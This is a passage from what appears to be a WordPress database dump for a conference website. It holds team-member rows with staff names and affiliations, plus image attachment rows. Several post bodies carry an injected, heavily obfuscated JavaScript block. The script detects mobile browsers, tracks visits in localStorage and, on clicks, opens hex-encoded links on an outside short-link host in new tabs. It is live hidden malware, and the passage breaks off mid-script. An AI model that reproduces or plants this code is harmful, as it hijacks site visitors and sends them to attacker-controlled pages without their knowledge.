_0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Caterina Balletti','','publish','closed','closed','','caterina-balletti','','','2022-11-23 06:10:36','2022-11-23 06:10:36','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3343',0,'dt_team','',0),
(3344,1,'2022-11-23 06:10:25','2022-11-23 06:10:25','','w224','','inherit','open','closed','','w224','','','2022-11-23 06:10:25','2022-11-23 06:10:25','',3343,'https://gsw2023.com/wp-content/uploads/2022/11/w224.jpg',0,'attachment','image/jpeg',0),
(3345,1,'2022-11-23 06:11:52','2022-11-23 06:11:52','<!-- wp:paragraph -->\n<p>TU Wien (WGII/7)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Gottfried Mandlburger','','publish','closed','closed','','gottfried-mandlburger','','','2022-11-23 06:11:55','2022-11-23 06:11:55','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3345',0,'dt_team','',0),
(3346,1,'2022-11-23 06:11:37','2022-11-23 06:11:37','','w225','','inherit','open','closed','','w225','','','2022-11-23 06:11:37','2022-11-23 06:11:37','',3345,'https://gsw2023.com/wp-content/uploads/2022/11/w225.jpg',0,'attachment','image/jpeg',0),
(3347,1,'2022-11-23 06:13:10','2022-11-23 06:13:10','<!-- wp:paragraph -->\n<p>National Technical University of Athens (WGII/7)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 